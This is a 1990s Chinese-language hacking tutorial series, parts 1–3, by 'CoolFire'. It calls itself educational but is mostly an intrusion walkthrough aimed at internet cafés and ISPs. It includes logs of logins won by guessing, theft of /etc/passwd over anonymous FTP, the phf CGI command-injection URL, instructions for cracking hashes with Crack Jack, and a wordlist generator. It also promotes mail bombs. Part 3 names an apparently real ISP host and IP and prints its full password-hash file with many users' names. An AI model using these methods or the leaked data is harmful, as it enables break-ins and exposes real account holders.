NO IMAGE

如何攻破一個系統(1-5)
1
這不是一個教學檔案, 只是告訴你該如何破解系統, 好讓你能夠將自己的系統作安全的保護, 如果你能夠將這份檔案完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 並不是教人 Crack Password 若有人因此檔案導致惡意入侵別人的電腦或網路, 本人概不負責 !!

#1 甚麼是 Hacking ?
就是入侵電腦! 有甚麼好解釋的! 大部份有關介紹 Hacker 的書籍或小說及檔案等都有清楚的介紹, 沉迷於電腦的人… 破壞… 唉! 一大堆怪解釋就是了, 最好不要成為一個 “駭客”, 我… 不是!

#2 為甚麼要 Hack ?
我們只是為了要了解更多關於系統的技術, 入侵它, 瞭解它是如何運作的, 試試它的安全性, 然後學著去使用它, 讀取系統中有關操作的說明, 學習它的各項操作 !! 為了安全性而作革命!

#3 Hack 守則
1. 不惡意破壞任何的系統, 這樣作只會給你帶來麻煩.
惡意破壞它人的軟體將導致法律刑責, 如果你只是使用電腦, 那僅為非法使用!! 注意: 千萬不要破壞別人的軟體或資料 !!
2. 不修改任何的系統檔, 如果你是為了要進入系統而修改它, 請在答到目的後將它改回原狀.
3. 不要輕易的將你要 Hack 的站臺告訴你不信任的朋友.
4. 不要在 bbs 上談論你 Hack 的任何事情.
5. 在 Post 文章的時候不要使用真名.
6. 正在入侵的時候, 不要隨意離開你的電腦.
7. 不要侵入或破壞政府機關的主機.
8. 不在電話中談論你 Hack 的任何事情.
9. 將你的筆記放在安全的地方.
10. 想要成為 Hacker 就要真正的 Hacking, 讀遍所有有關係統安全或系統漏洞的檔案 (英文快點學好)!
11. 已侵入電腦中的帳號不得清除或修改.
12. 不得修改系統檔案, 如果為了隱藏自己的侵入而作的修改則不在此限, 但仍須維持原來系統的安全性, 不得因得到系統的控制權而將門戶大開 !!
13. 不將你已破解的帳號分享與你的朋友.

#4 破解之道
1. 進入主機中
2. 得到 /etc/passwd
3. 得到系統帳號
4. 得到最高許可權

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 1.
進入主機有好幾種方式, 可以經由 Telnet (Port 23) 或 SendMail (Port 25)或 FTP 或 WWW  (Port 80) 的方式進入, 一臺主機雖然只有一個位址, 但是它可能同時進行多項服務, 所以如果你只是要 “進入” 該主機, 這些  Port 都是很好的進行方向. 當然還有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麼??? 我不知道, 你知道嗎?!

底下的示範並不是像寫出來的那麼容易, 只不過是要讓你瞭解如何進入, 當然其中還有很多問題, 如打錯指令…… 等等的毛病… 沒有出現在課堂上, 但是我為了面子…. 一定要刪掉這些不堪入目的東西嘛…

示範進入主機的方法: (By CoolFire)

(首先要先連上某一臺你已經有帳號的 Telnet 主機, 當然最好是假的, 也就是 Crack過的主機, 然後利用它來 Crack 別的主機, 才不會被別人以逆流法查出你的所在)

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0

(我用的是 ms.hinet.net … 當然是假的羅, 都已經經過修改了啦 !!沒有這一臺主機啦 !! 別怕 ! 別怕 ! 以下的主機名稱都是假的名稱,要記得 !!)

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯… 進來了 ! 開始攻擊吧 ! 本次的目標是……)

ms.hinet.net> telnet www.fuckyou.hinet.net (Telnet 試試看….)
Trying 111.222.255.255…
Connected to cool.fuckyou.hinet.net.
Escape character is ‘^]’.
Password:
Login incorrect
(沒關係, 再來 !!)
cool login: hinet
Password:
Login incorrect

cool login:

(都沒猜對, 這邊用的是 猜 的方法, 今天運氣好像不好)
telnet> close
Connection closed.

(重來, 換個 Port 試試看 !!)

ms.hinet.net> telnet 111.222.255.255 80
Trying 111.222.255.255…
Connected to 111.222.255.255.
Escape character is ‘^]’.

<HTML>
<HEAD>
<TITLE>Error</TITLE>
</HEAD>
<BODY>
<H1>Error 400</H1>

Invalid request “” (unknown method)

<P><HR><ADDRESS><A HREF=”http://www.w3.org”>CERN-HTTPD 3.0A</A></ADDRESS>
</BODY>
</HTML>
Connection closed by foreign host.

(哇哩 !! 連密碼都沒得輸入, 真是….. 再來 !! 要有恆心 !!)
(換 FTP Port 試試)

ms.hinet.net> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to [email protected]
230-If you do have problems, please try using a dash (-) as the first character
230-of your password — this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

(哇 ! 可以用 anonymous 進來耶!! password 部份輸入 [email protected] 就好了 !
不要留下足跡喔!!)

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.

(嗯嗯… 太好了 ! 進來了 !! 下一個目標是…..)

ftp> cd etc
250 CWD command successful.
ftp> get passwd (抓回來 !!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(喔… 這麼容易嗎??)
ftp> !cat passwd (看看 !!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0perator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash

(哇哩… 是 Shadow 的… 真是出師不利…. )

ftp> bye
221 Goodbye.

(不信邪…. 還是老話, 要有恆心….)
(FTP 不行, 再 Telnet 看看 !!)

ms.hinet.net> telnet www.fuckyou.hinet.net
Trying 111.222.255.255…
Connected to cool.fuckyou.hinet.net.
Escape character is ‘^]’.
Password:
Login incorrect

(又猜錯 !!)

cool login: fuckyou
Password:
Last login: Mon Dec 2 09:20:07 from 205.11.122.12
Linux 1.2.13.

Some programming languages manage to absorb change but withstand
progress.

cool:~$

(哇哈哈 !! 哪個笨 root, 用 system name 作 username 連
password 也是 system name…. 總算… 沒白玩…)

cool:~$ system
bash: system: command not found

(嗯… 這個 user 的許可權好像不大….)

cool:~$ ls
cool:~$ pwd
/home/fuckyou
cool:~$ cd /
cool:/$ ls
Public/ cdrom/ lib/ mnt/ tmp/ www/
README dev/ linux* proc/ usr/
bin/ etc/ local/ root/ var/
boot/ home/ lost found/ sbin/
cool:/$ cd etc
telnet> quit
Connection closed.
ms.hinet.net> exit

已經進來了
進入主機 !!
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 2.

抓回來一個 “亂七八糟” 的 /etc/passwd, 你以為我的真那麼笨嗎?? guest 所抓回來的能是甚麼好東西?? 所以繼續上次的攻擊行動.我們已經 “猜” 到了一個不是 guest 的 username 及 password.就以它來進入主機瞧瞧!!

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯… 進來了 ! 開始攻擊吧 ! 本次的目標是…..呵…)

ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet 試試看…. 昨天的位址,
有作筆記吧!)
stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net
Trying 111.222.255.255…
Connected to cool.fuckyou.hinet.net.
Escape character is ‘^]’.
Password:
Login incorrect

cool login: fuckyou
Password: (一樣輸入 fuckyou)
Last login: Mon Dec 1 12:44:10 from ms.hinet.net
Linux 1.2.13.

cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS ftpusers localtime resolv.conf
HOSTNAME gateways magic rpc
NETWORKING group mail.rc securetty
NNTP_INEWS_DOMAIN host.conf motd sendmail.cf
[email protected] hosts messages/ sendmail.st
XF86Config hosts.allow mtab services
at.deny hosts.deny mtools shells
bootptab hosts.equiv named.boot shutdownp
csh.cshrc hosts.lpd networks snoopy/
csh.login httpd.conf nntpserver slip.hosts
exports inetd.conf passwd snooptab
fastboot inittab passwd.OLD syslog.conf
fdprm issue passwd.old syslog.pid
fstab ld.so.cache printcap ttys
ftpaccess ld.so.conf profile [email protected]

(找尋目標….. 太亂了 ! 懶得找, 再來 ….)
cool:/etc$ ls pa*
passwd passwd.OLD passwd.old

(果然在)

cool:/etc$ more passwd
(看看有沒有 Shadow…)

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(正點 ! 一點都沒有防備 !!)
cool:/etc$ exit
logout
(走了!…. 換 FTP 上場 !!)
Connection closed by foreign host.
ms.hinet.net> ftp www.fuckyou.hinet.net
Connected to cool.fuckyou.hinet.net.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (www.fuckyou.hinet.net:66126): fuckyou
331 Password required for fuckyou.
Password:
230 User fuckyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> cd /etc
250 CWD command successful.
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)

ftp> !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(看看 ! 呵 ! 假不了 !!……)
ftp> bye
221 Goodbye.
ms.hinet.net> exit

(閃人羅 !! 喔慢點, 還有事要說明……)

passwd 的 Shadow 就是把 passwd 放在 shadow 檔中, 而你原先在第一節課所看到的這個格式的 passwd 並不是真正的 passwd….

root::0:0:root:/root:/bin/bash

因為密碼的部份沒有東西…. 所以拿了也沒有用 !! 但這次所拿到的東西呢,像是這樣, 有幾點需要說明的, 就是它究竟代表著甚麼???

john:234ab56:9999:13:John Smith:/home/john:/bin/sh

它以 “:” 分成幾個欄位, 各欄位對照如下:
User Name: john
Password:234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh

保留著你千辛萬苦所拿到的 passwd, 咱們再來告訴各位如何使用 Crack Jack 把 passwd 解碼….

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Crack Jack V1.4 中文使用說明 (By CoolFire 12-1-1996)

咱們來說說 Crack Jack ! 這可是個解讀 /etc/passwd 的好工具喔,不要告訴我你習慣用Brute, 拿 Brute 跟  Crack Jack 的速度比比看, 包準你馬上投向 Crack Jack 1.4的懷抱, 但請先確定你所使用的是  Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page
中拿到這個版本的 Crack Jack ! 這才是真正有用的版本, 速度… 對… 就是這點別人都比不上 !但還是要講講它的缺點… 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上開個 DOS Mode 跑,它可是連理都不會理你的 !

OK! 現在切入正題 ! etc/passwd 拿到手了吧 !! 開始羅 !! 使用 Crack Jack 1.4前所需要的東西有這些 [1]  Crack Jack 1.4 (廢話…$%^&@@) [2] /etc/passwd 檔案, 你可以在 Unix
系統中的 /etc/ 目錄中找到 passwd [3] 字典檔 (哪裡找, 自己敲… 呵 ClayMore 中有一份
DIC.TXT是有一千多個字的字典, 但比起我的字典可就小巫見大巫了, LetMeIn! 1.0 裡面也有, 聽James說 2.0 Release 的時候會有更棒的字典檔含入, 期待吧!)…. 使用 Crack Jack 1.4
前需先確定你所使用的機器是 386 含以上 CPU 的 ! 然後最好有充足的記憶體 !!

開始 Jack 時只要敲入 JACK 即可, 它會問你 PW Name… 輸入你的 passwd 檔名,Dictionary
Name 輸入你的字典檔名, Jack 就會開始找了 ! 找到時會告訴你, 也會在 JACK.POT中寫入它所找到的密碼 !! 但… 有點怪的格式! 如果找到的是具 root 許可權的密碼, Jack 會告訴你
This is JackAss… 嗯…說髒話了 !! 因為使用 Jack 佔用的時間實在太多,如果你中途想要停掉時只要按下 Ctrl- C 即可, 別以為你前功盡棄了! 因為 Jack 有個 Restore 的功能,中斷時會自動存檔為 RESTORE, 下次要繼續這次的尋找只要輸入 Jack -Restore:RESTORE 即可 !!
當然你也可以為你的 Restore 重新命名 ! Jack 也會找得到的 … 如Renrestorerestore.HNT
之後要再尋找的時後就 Jack -Restore:RESTORE.HNT 即可… Jack 會很自動的 Restore
前次所尋找的字串…繼續幫你找下去….

字典檔哪裡找: 我的不給你! 可以找別的 Brute Force 之類的程式, 有些裡面會附,或是找找其它的 Hacker 地下站看看有沒有, 自己編一個, 或找個英漢字典軟體將字典的部份解出來,
可能要有一點資料欄位及寫程式的基礎.

成功的案例: 找到過某家網路咖啡店的 root 許可權密碼 ! Jack好正點呀 !!!所花的時間: 20 分鐘左右… 但也有找了一兩天也找不到的….. 嗚… 駭客們! 加油吧 !!

2
上文 CoolFire 講到許多的 Net Coffee 店, 安全性之差實在是沒話說,但是過了這麼久也不見有幾家改進, 可能是想讓自己的電腦被別人玩弄在股掌之間吧, 但可不是每個人都像CoolFire這樣溫和, 如果遇到的是比較狠一點的角色, 那你的 Net Coffee 可能要有一兩天只賣Coffee 而沒辦法再 Net 下去了!!

繼 CoolHC#1 推出後, 有許多人是否已經躍躍愈試了呢 ?? 這次咱們不談新的花招,用用之前所講的再來探險一番, 當然, 這一次我照往例還是不會使用真正的 Domain Name 來作教學,但是課程中的所有內容絕對屬實, 當然本次攻擊的物件還是….  Net Coffee Shop….

**談一下 Crack Jack 猜猜密碼

許多人從上一次介紹 Crack Jack 之後就應該已經領教過它的功力了,但是有幾點需要說明的,
有些人使用 Jack 來幫你尋找 password, 我就當你已經抓到了沒有 shadow 的 /etc/passwd,
但是為甚麼使用 Jack 還是找不到呢?? 我想你應該要換個正點一點的字典檔了, 因為Jack 還
是根據你所提供的字典檔在尋找, 如果你提供的字典本身就沒有這些字,那當然連一個小小帳號
的密碼你都別想猜到了. 數一下你所使用的字典檔中有多少字 ???我用的字典檔有十九萬多個
字, 你的呢? 是不是小巫見大巫呀 ?? 那麼就趕快充實一下字典檔再重新尋找吧 !!

許多人的密碼都有一定的法則, 我自己寫了 PaSs2DiC 就是將 UserName 由passwd檔轉成字典檔的工具, 這是對一些喜歡使用  UserName 當作 Password 的人最好的方式,但是也曾經好運的找到別人的密碼, 真不曉得”甲”是不是暗戀”乙”才用”乙”的 ID  作為密碼的 ???你可以很簡單的使用Qbasic 來製作 “序數” 密碼, 或日期密碼, 底下簡單的作一個 0101 (一月一日) 到
1231 的密碼
檔出來:
————Cut Here MakeDate.BAS ——————-
Open “Dates” for output as #1
for I=1 to 12
for J=1 to 31
I1$=rtrim$(ltrim$str$(I)))
J1$=rtrim$(ltrim$str$(J)))
if len(I1$)=1 then I1$=”0″ I1$
if len(J1$)=1 then J1$=”0″ J1$
Out$=I1$ J1$
print #1,Out$
next I
next J
close
———— Cut Here End MakeDate.BAS —————-
這支小程式將會寫一個 “DATES” 的檔案, 裡面就是你要的字典, 當然啦,這只是包含月跟日 !!
如果你要猜的密碼是含年份的, 你可能要再增加一些程式碼, 再 Run 一次試試看了,不過這是一個好的開始不是嗎 ??

**如何保護自己的密碼

談了這麼多的密碼猜法, 當然要談一下如何保護自己的密碼不被破解,
請遵守以下的原則:

[1]不用生日作為密碼(太容易猜了啦) [2]不用序數作為密碼(除非你的序數無限大)
[3]不用身份證字號作為密碼(LetMeIn! 裡有猜身份證字號的功能耶)
[4]不用在字典中查得到的字作為密碼.

那麼依照上面的幾點說法, 甚麼樣子的密碼最不容易猜, 自己也最好記呢?? 答案是:用一句有意義的話來作為自己的密碼, 例如:  NoOneCanCrackIt 就是一個很難猜的密碼型別,基於這個密碼猜法的原則, 你的密碼是不是要作些更新, 或是大小寫要作一些對調 ??  如果你的密碼是
coolfire,
建議你最好能改成 CoolFire 或 coolfires (加複數 “s”),
這樣被猜中的機率就小了很多. 如果你是一個 Hacker, 你的密碼也被人猜中的話… 那…#%%^^^&@

**正式的話題

這次的話題當然還是 Crack, 相信許多人已經看過 CoolHC#1 了,當然眼尖的人可能也已經 D/L
System Holes 試過了, 你有成功的例子嗎 ?? 如果沒有, 這份 CoolHC#2可能就是你的強心針,
因為這次談的正是 System Holes #1 成功的案例.Step 1. 連線到 “蕃薯藤” 找 “網路咖啡” 找到好多家網路咖啡的 WWW 網址,一一連上去試試看
在 System Holes #1 中的方法可不可行.
Step 2. 若可行則會傳回 /etc/passwd 資訊, 存檔後迅速 Logout, 使用 Crack Jack
解讀!!

[[例項探討]]

System Holes #1 中所介紹的 WWW 入侵法是這樣子的:
http://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd

[1] 用 WWW Browser 連到 yournet.net
[2] Location 輸入 –> “www.yournet.net/cgi-bin/nph-test-cgi?*”
[3] 接著如果出來一份像 Report 的畫面的話, 接著輸入
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
[4] 發生了甚麼事?? etc/passwd 在你的瀏覽器中 “顯示” 出來了 !! 快點 Save 吧
!!

這個方法所用的是系統 “檢索” 的漏洞, 不提供這個功能,或是伺服器檢索型別不同的機器則不
會接受這樣的指令, 當然也就逃過我們這次的模擬演練啦 !! 但是…. 相信我,你一定會找到一家脫線的網路咖啡, 並沒有像我們一樣每天閱讀  Mail List 的信,對系統安全一點研究也沒有的人不在少數. http://hacker.welcome.com 就是這樣的一個  Net Coffee Shop…呵…. 快來試試吧 !!

當 CoolFire 抓到 /etc/passwd 後, 立刻存檔, 也馬上斷線, 並且拿出 UltraEdit來瞧一下使用者的資訊, 當然這個小 passwd 對 Crack Jack 來說, 實在是不夠看,沒幾分鐘就在我的 486 機器上顯示出來幾個以 UserName 作為  Password 的資訊 (歸功於 PaSs2DiC 及CrackJack 的功勞)不過當我試著找尋 root 的密碼時, 一想到我那將近  20 萬字的字典檔,就想到可能花費的時間一定相當的驚人, 於是就以 Jack 的 Option 設定只尋找 root 那一行, …(過了良久)… 果不然又是一個笨 root. 用了 “非常” 容易猜的密碼… <— This is JackAss… 呵!!  Got It!

如果你所使用的機器速度不是頂快, 你最好能夠到快一點的機器上使用 Crack Jack,不然你也可以將字典檔切割成幾個小檔案, 然後再分別在幾臺機器上跑, 我目前使用的配備是486DX4-13032MB RAM, 3.2GB HDD, 近 20 萬字的字典檔, 如果在分析較大的  passwd檔時我會將字典檔切割為四至五個小檔 (看有多少臺機器可跑),然後在週末下班前在公司的幾臺機器上分別執行 Crack Jack, 等到禮拜一上班時就等著接收成果了! 當然如果你只有一臺機器, passwd檔又很大的話,由於 Crack Jack 無法於 Windoz 95 下使用, 你可能只能犧升時間或機器來跑了!再沒有辦法的話, 亦可使用單機多工, 多開幾個 DOS Box 來跑 Brute, 也許也是一個可行的辦法!

**後語

有許多人在使用 Crack Jack 的時候有許多問題, 不過看了 CoolHC#1 應該都解決了吧?? 最近大家問的比較多的是  UpYours 3.0, 雖然已經改進了 Install 的問題,不過大家的問題還是都出在Winsck.ocx 上面, 有人說裝了  MSICP Beta 會好 ?? 但也有例項裝了也還不能 Run 的,
在此建議大家不要再玩 MailBomb 了, 雖然我喜歡收集這種東西, 但還是少亂炸為妙,已經證實有許多常用的 MailBomb 沒有辦法  Fake IP 了 !! 所以… 如果 UpYours 3.0裝不起來的人就試試 KaBoom!V3.0 吧 ! 雖然沒有辦法  Fake IP (選錯 Mail Server 的話), 但是也是一個不錯的AnonyMailer如果要發匿名信, 現在首頁上有可以幫你發信的  Mailer, 會安全一點.

如果你仍舊對 UpYours 3.0 不死心, 就試試 ResSvr32.exe (Under Windows/systemrectory),
看看能不能將 WinSck.ocx 裝上了… 記得先 UnReg 再 Reg…

在此建議大家可以多訂閱一些 “系統安全” 討論的 Mail List或多參考一些已經被找出來的系統漏洞, 因為有些人對這些方面並不是很重視, 所以這些資訊也就顯得格外的重要了,如果能夠多參考一些資訊, 在你入侵的時候會有很大的幫助, 當然, 如果你能作出一份列表出來,放在手邊參考的話,  就可以快速的; 安全的入侵了!! 下一次所談的是 SendMail 的 Bug 例項,在這中間當然照往例會先出一份  System Holes #2 來作為資料. 如果有興趣的人在 SH#2出來的時候可以先研究看看.
——
3
前幾節說到了 Net Coffee 店, 還好他們沒有提供客戶撥接上線的功能,不然密碼或是帳號被人盜用的客戶不就糗大了! 但是 CoolFire 在這兩週的探險中, 為了找一個酷似網路咖啡站臺的
W3 密碼,誤入一個號稱第一個提供網路撥接的 ISP, 且在 CoolFire 順利的抓回 /etc/passwd
之後, 使用了自己寫的 PaSs2DiC CJack 來解出密碼, 沒想到不用 1 分鐘, 就找出了 9 組 ID 與Password 相同的密碼,勿怪我沒有在這裡提醒大家, 還好我沒有找到 root password, 不然可能該系統就此停擺,不可再見天日也! (當然我不可能這麼作啦!).

看看最近興起的網路咖啡及各大網站的系統安全設施, 再加上 CoolFire最近開會的時候遇到的情況, 不難發現我們的國家正往高科技的領域快步邁進, 但是這些系統的安全性若不加強,可能到時候人家只要一臺電腦再加上一臺資料機就可以讓整個國家的金融及工商業崩潰!
大家要小心呀 !
ISP 是一般 User 撥接的源頭, 技術上理應比較強, 但還是輕易讓人入侵, 且又沒有教導User 正確的網路使用觀念 (Password 的設定及 proxy 的使用等),實在不敢想像這樣的網路發展到幾年後會是甚麼樣子 ??

這一次的說明還是沒有談到新的技巧, 在 James將首頁更新後各位應該已經可以從中學到許多東西了, 如果想要學習入侵, 就一定要知道最新的資訊  (入侵本國的網路則不用,反正沒人重視網路安全….. 真失望), 在別人還沒將 Bug 修正之前就搶先一步拿到 /etc/passwd,所以訂閱一些網路安全的 Mail List 是必要的, 多看一些網安有關的 News Group 也是必要的 (不僅 Hacker如此, ISP 更要多注意這些資訊!). 日後有空再整裡一些 Mail List 給大家 !!

本次主題: 說明如何連線該 ISP 並且對其 /etc/passwd 解碼連線位址: www.coffee.com.tw  (203.66.169.11)特別說明: 由於本次主題說明重點使用真實的位址及名稱, 所以 CoolFire 已經 Mail給該網頁之維護人員更改密碼, 但該網頁之 ISP 仍為新手之練習好題材! CoolFire
Mail 給該網頁維護人員之信件內容如下, 如果他還不盡快改掉, 我也沒辦法了!

Mail sent to [email protected]:
Subject: 請速更動網頁密碼
From: CoolFire <[email protected]>

你的網頁作得不錯, 但是因為你所設定的密碼太容易為駭客所? 入侵, 請於見到此信後速速更改你的網頁進入密碼, 否則下次若網頁遭到篡改, 本人概不負責!!

**** 課程開始 ****

請注意: 由於本次所作的課程內容以實作為主, 除了本人 IP 有所更改,一切都使用本人所用之
Telnet 軟體 Log 檔收錄, 故若道德感不佳者請勿閱讀以下之詳細破解內容,否則本人概不負責!

(連線到某一主機之後…. 此處的 ms.hinet.net.tw 是假的 Domain name)
ms.hinet.net.tw> telnet www.coffee.com.tw
Trying 203.66.169.11…
Connected to www.coffee.com.tw.
Escape character is ‘^]’.
Password: (隨便按一下 Enter)
Login incorrect

www login: coffee (以 Hacker 的敏銳判斷 username=coffee password=coffee)
Password:
Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw

歡 迎 光 臨 ……. 以下略! 因涉及該 ISP 的名譽, 大家自己去看吧!=================================================================

(直接進入核心部份)
www:~$ cd /etc
www:/etc$ ls
DIR_COLORS hosts.equiv printcap
HOSTNAME hosts.lpd profile
NETWORKING [email protected] protocols
NNTP_INEWS_DOMAIN inetd.conf psdevtab
[email protected] inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab ioctl.save rpc
csh.cshrc issue securetty
csh.login issue.net securetty.old
default/ klogd.pid sendmail.cf
diphosts ld.so.cache sendmail.st
exports ld.so.conf services
fastboot lilo/ shells
fdprm lilo.conf shutdownpid
fs/ localtime skel/
fstab magic slip.hosts
ftp.banner mail.rc slip.login
ftp.deny motd snooptab
ftpaccess motd.bak sudoers
ftpconversions msgs/ syslog.conf
ftpgroups mtab syslog.pid
ftpusers mtools termcap
gateways named.boot ttys
gettydefs networks [email protected]
group nntpserver vga/
host.conf passwd [email protected]
hosts passwd.OLD yp.conf.example
hosts.allow passwd.old
hosts.deny ppp/

(看看我們的目標長得如何???)
www:/etc$ cat passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0perator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100erfect Women:/home/w3/women:/bin/bash
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100rime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
lancef7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash
liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
sales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwuai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
